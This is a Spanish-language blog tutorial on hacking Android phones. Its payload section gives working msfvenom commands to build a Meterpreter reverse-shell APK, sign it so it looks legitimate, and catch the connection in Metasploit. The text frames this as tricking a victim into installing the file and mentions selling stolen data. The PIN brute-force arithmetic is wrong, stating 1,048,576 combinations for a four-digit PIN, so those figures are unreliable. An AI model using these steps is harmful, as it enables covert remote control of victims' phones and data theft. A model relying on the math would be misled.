Cómo hackear teléfonos Android by@morpheuslord
8,888 lecturas

Cómo hackear teléfonos Android

2021/06/11NaN
por @morpheuslord 8,888 lecturas
ES
Read on Terminal Reader

Demasiado Largo; Para Leer


Companies Mentioned

Mention Thumbnail
Mention Thumbnail
featured image - Cómo hackear teléfonos Android
Morpheuslord HackerNoon profile picture

@morpheuslord

Morpheuslord

I am a red team operator, and a security enthusiast...

Aprender Mas
LEARN MORE ABOUT @MORPHEUSLORD'S EXPERTISE AND PLACE ON THE INTERNET.

Credibility

react to story with heart

Los métodos utilizados por los atacantes para explotar los teléfonos Android están aumentando. La gente está ocupada encontrando nuevas vulnerabilidades para explotar. A continuación se muestran algunas formas de hackear teléfonos Android:

  • Ataque HID (dispositivo de interfaz humana)
  • Contraseña fuerza bruta
  • Cargas útiles (secuencias de comandos de piratería personalizadas)
  • Restablecimiento de fábrica
  • Derivación

ESCONDIDO

El ataque HID es un escenario en el que un atacante toma una plataforma de desarrollo integrada programable, como un paquete de software asociado como SET (Social Engineering Toolkit), Metasploit, etc., o usa otros teléfonos y USB que están programados para ser un RubberDucky y ejecutar un ataque.

image

En tal ataque, el hacker instala una puerta trasera y, al usarla, descarga completamente la información del objetivo.

Usando la información, puede piratear la cuenta bancaria de la persona o incluso venderla en la web oscura.

Puedes ver cómo se lleva a cabo un ataque oculto desde el

 android infosec
canal

Iniciar sesión Fuerza bruta

Un ataque de fuerza bruta utiliza el método de prueba y error para adivinar la contraseña correcta del teléfono.

image

Algunos puntos importantes a considerar para realizar un ataque de este tipo:

  • Número de contraseñas
  • el tiempo de espera
  • El tiempo que podría tomar

El tiempo de espera:

 After 5 Wrong pin 's - 30 sec delay After 1 Wrong pin' s - 30 sec delay After 41 Wrong pin 's - 30 sec delay

El número de contraseñas:

El número total de combinaciones posibles para un candado numérico de 4 dígitos puede comenzar desde 4 ceros hasta 4 nueves, lo que significa 0000-9999, por lo que tenemos aproximadamente:

 4 ^ 10 amount of password or
1048576 passwords in total

Tiempo consumido:

Veamos algunas posibilidades para nuestra comprensión:

Posibilidad #1: 5 contraseñas incorrectas, un retraso de 30 segundos. Necesitamos averiguar cuántas veces obtenemos el retraso en primer lugar y encontrar el tiempo total consumido.

 total delay 1048576 / 5 = 209715.2 times total time 209715.2 * 30 = 6291456 sec or
1747.6266 hours

Posibilidad #2 : 41 contraseñas incorrectas, demora 30 seg.

 total delays 1048576 / 41 = 25 , 575.0243 delays total time consumed 25575.0243 * 30 = 7 , 67 , 250.729 sec or 
767250.729 / 60 = 12 , 787.5121 min
or
12 , 787.51215 hours

Puede ver que es casi imposible encontrar la contraseña del teléfono de la persona por fuerza bruta. Estarás muerto cuando encuentres la contraseña del teléfono 😣.

cargas útiles

image

Las cargas útiles son scripts simples que ayudan a un pirata informático a piratear un sistema. Entonces, si solo engaño a la persona para que autorice e instale el archivo .apk, lo que abre una puerta trasera para que Meterpreter escuche una conexión para controlar el sistema.

 meterpreter reverse tcp payload creation command:

 msfvenom –p android/meterpreter/reverse_tcp LHOST =Localhost IP LPORT =LocalPort R > android_shell.apk

La carga útil es -p, LHOST Localhost IP para recibir una conexión posterior (verifique la suya con el comando if-config ), LPORT Puerto localhost en el que la conexión escucha a la víctima (lo configuramos en 4444), formato R Raw (seleccionamos .apk ).

Necesitamos proporcionar un certificado al archivo .apk para darle una identidad. Necesitamos firmar un certificado para un archivo .apk para reconocerlo como una aplicación. Sin esto, el archivo .apk se reconocerá como un virus.

Para asignar un certificado, debe seguir estos pasos

Instalar:

  • herramienta clave
  • firmante del tarro
  • tirolesa

Firme el archivo .apk localmente:

 keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000

Keytool haciendo Keystore:

 jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android_shell.apk hacked

Firmando un archivo .apk con JARsigner:

 jarsigner -verify -verbose -certs android_shell.apk

Instale y use Zipalign:

 sudo apt-get install zipalign or sudo apt install zipalign 
 zipalign -v 4 android_shell.apk singed_jar.apk

Ahora ejecute el comando para eso está en la consola de Metasploit:

 use exploit/multi/handler

Y configure los diversos parámetros en Metasploit como lhost, lport, etc. Ahora debe ejecutar el comando después de configurar el host y el tipo de puerto:

 type: run (and press enter)

Después de ejecutar este código, recibirá una conexión con el sistema de destino. Con esto, puede acceder a todo el sistema y obtener acceso completo.

Restablecimiento de fábrica

image

Un teléfono flasheado es un dispositivo en el que se ha flasheado una ROM/sistema operativo diferente sobre el sistema que viene con el teléfono. A menudo, los teléfonos pueden mostrarse desbloqueados cuando, en realidad, siguen siendo teléfonos con la marca del operador que no serán compatibles con nuestro servicio.

Para cada teléfono, existen diferentes métodos para el restablecimiento de fábrica, el más común es hacerlo a través de los botones de volumen y el botón de encendido. Por ejemplo, tengo un viejo teléfono oppo para el cual la combinación de restablecimiento de fábrica es el botón de volumen y el botón de encendido y durante 5 segundos y el teléfono parpadea.

Derivación

Bypass es un método comúnmente utilizado por las fuerzas del orden como la CIA, el FBI y en India, IB y RAW utilizan un dispositivo especial como se muestra en la imagen.

image

En este tipo de ataque, depende principalmente de que el atacante use IP_BOX, que funciona principalmente en la fuerza bruta del objetivo. Esto es utilizado principalmente por las fuerzas del orden público para acceder a los teléfonos de los ciberdelincuentes terroristas y los teléfonos de otros delincuentes.

Puede usar otra herramienta conocida como BashBunny de hak5. Esta es una mini computadora desde la cual puede realizar un ataque de fuerza bruta de inicio de sesión. A diferencia de las otras opciones anteriores, esta es una bestia seria en su trabajo. En cuestión de horas, puede descifrar las contraseñas más difíciles con facilidad.

Nota

Este tutorial es solo para fines educativos. No intentes esto y te metas en problemas.

Fuentes

Sígueme

  • Twitter: morfeuslord2
  • Instagram: morpheuslord_9034
  • correo electrónico: [email protected]
Morpheuslord HackerNoon profile picture
by Morpheuslord @morpheuslord.I am a red team operator, and a security enthusiast I write blogs and articles related to cyber-sec topics.
Read My Stories

HISTORIAS RELACIONADAS

L O A D I N G
. . . comments & more!
Hackernoon hq - po box 2206, edwards, colorado 81632, usa